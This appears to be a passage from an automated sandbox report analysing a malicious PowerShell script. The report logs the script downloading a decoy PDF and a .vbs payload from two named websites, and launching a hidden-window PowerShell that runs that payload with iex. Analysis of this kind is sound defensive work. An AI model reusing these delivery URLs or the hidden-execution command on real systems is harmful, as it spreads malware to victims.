                                                                                              Dec 19, 2024 12:51:28.983484030 CET1.1.1.1192.168.2.50x531bNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.212.68A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:28.983484030 CET1.1.1.1192.168.2.50x531bNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:31.905637026 CET1.1.1.1192.168.2.50x4aabNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:45.981415033 CET1.1.1.1192.168.2.50x8bbfNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 12:52:01.917258024 CET1.1.1.1192.168.2.50x61d4No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 12:52:33.722270012 CET1.1.1.1192.168.2.50x6ab9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:52:33.722270012 CET1.1.1.1192.168.2.50x6ab9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • www.astenterprises.com.pk
                                                                                              • www.bluemaxxlaser.com

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.549705203.175.174.69802696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 19, 2024 12:51:22.632498026 CET80OUTGET /ms/ms.vbs HTTP/1.1
                                                                                              Host: www.bluemaxxlaser.com
                                                                                              Connection: Keep-Alive
                                                                                              Dec 19, 2024 12:51:24.167141914 CET516INHTTP/1.1 404 Not Found
                                                                                              Date: Thu, 19 Dec 2024 11:51:23 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 315
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.549704107.161.23.1504432696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 11:51:20 UTC127OUTGET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                              Host: www.astenterprises.com.pk
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-19 11:51:20 UTC217INHTTP/1.1 200 OK
                                                                                              Connection: close
                                                                                              content-type: application/pdf
                                                                                              last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                              accept-ranges: bytes
                                                                                              content-length: 871324
                                                                                              date: Thu, 19 Dec 2024 11:51:20 GMT
                                                                                              server: LiteSpeed
                                                                                              2024-12-19 11:51:20 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                                                              Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                              2024-12-19 11:51:20 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                                              Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                                              2024-12-19 11:51:20 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                                              Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                                                              2024-12-19 11:51:20 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                              Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                              2024-12-19 11:51:20 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                              Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                                              2024-12-19 11:51:20 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                              Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                              2024-12-19 11:51:21 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                              Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                                              2024-12-19 11:51:21 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                              Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                              2024-12-19 11:51:21 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                              Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                              2024-12-19 11:51:21 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                              Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:06:51:08
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1"
                                                                                              Imagebase:0x7ff7be880000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:06:51:08
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff6d64d0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:06:51:10
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'"
                                                                                              Imagebase:0x7ff7be880000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:06:51:21
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                              Imagebase:0x7ff686a00000
                                                                                              File size:5'641'176 bytes
                                                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:06:51:22
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                              Imagebase:0x7ff6413e0000
                                                                                              File size:3'581'912 bytes
                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:06:51:22
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                              Imagebase:0x7ff7e52b0000
                                                                                              File size:55'320 bytes
                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:06:51:22
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1528,i,9795832297208486948,11593460872991007467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                              Imagebase:0x7ff6413e0000
                                                                                              File size:3'581'912 bytes
                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Executed Functions

                                                                                                Function 00007FF848FF4F15 Relevance: 1.7, Strings: 1, Instructions: 436COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2322684759.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @_H
                                                                                                • API String ID: 0-518063247
                                                                                                • Opcode ID: 357c97be1f78d777998fbb75682030ba9f7e35e1416eca175a2bbf11fa65b720
                                                                                                • Instruction ID: c17e4b88da2a629c234e8f40391620e69484b9a20ec3aeab47f757d958c16781
                                                                                                • Opcode Fuzzy Hash: 357c97be1f78d777998fbb75682030ba9f7e35e1416eca175a2bbf11fa65b720
                                                                                                • Instruction Fuzzy Hash: FFD14431D0EA8A5FEB95EB2858555B5BBA0EF1A390F0801FBD54CCB1D3DB18A805C399
                                                                                                Function 00007FF848FF21C4 Relevance: .1, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2322684759.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7e3be6aa928e55fbc239ff5b97b1bff6ff13355b3dfcb6edd1ad3a0b1d0a7754
                                                                                                • Instruction ID: 30c6ebfacce6132a7afd975da51534feae2ddab638794dc9515f90787eaeae58
                                                                                                • Opcode Fuzzy Hash: 7e3be6aa928e55fbc239ff5b97b1bff6ff13355b3dfcb6edd1ad3a0b1d0a7754
                                                                                                • Instruction Fuzzy Hash: AC212332E1EA8A4FF399A76C185517466D2EF852A0F5800BBD21CC71D3EF2DAC05822D
                                                                                                Function 00007FF848F23BB5 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2322071902.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                                • Instruction ID: d725330ba92709bd9ebeb30e62369127f6c3244bce203fd248fe808a27b82538
                                                                                                • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                                • Instruction Fuzzy Hash: 7701677111CB0C4FD754EF0CE451AA5B7E0FB95364F10056EE58AC36A5D736E882CB46

                                                                                                Executed Functions

                                                                                                Function 00007FF848FE3135 Relevance: .4, Instructions: 431COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2110523004.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ff848fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 353a1e8c7c012891626700c3e11971f4eb249b43683a36a576474a0eef84cd04
                                                                                                • Instruction ID: c4d224448ef5316cd81e5c43fa47fddd2de1bafe7bb702254a9b582406839941
                                                                                                • Opcode Fuzzy Hash: 353a1e8c7c012891626700c3e11971f4eb249b43683a36a576474a0eef84cd04
                                                                                                • Instruction Fuzzy Hash: 81D11231D1EA8A5FEB55EB2C58199B5BBA1EF06394F0801FED04DC71D3DB1CA8058365
                                                                                                Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
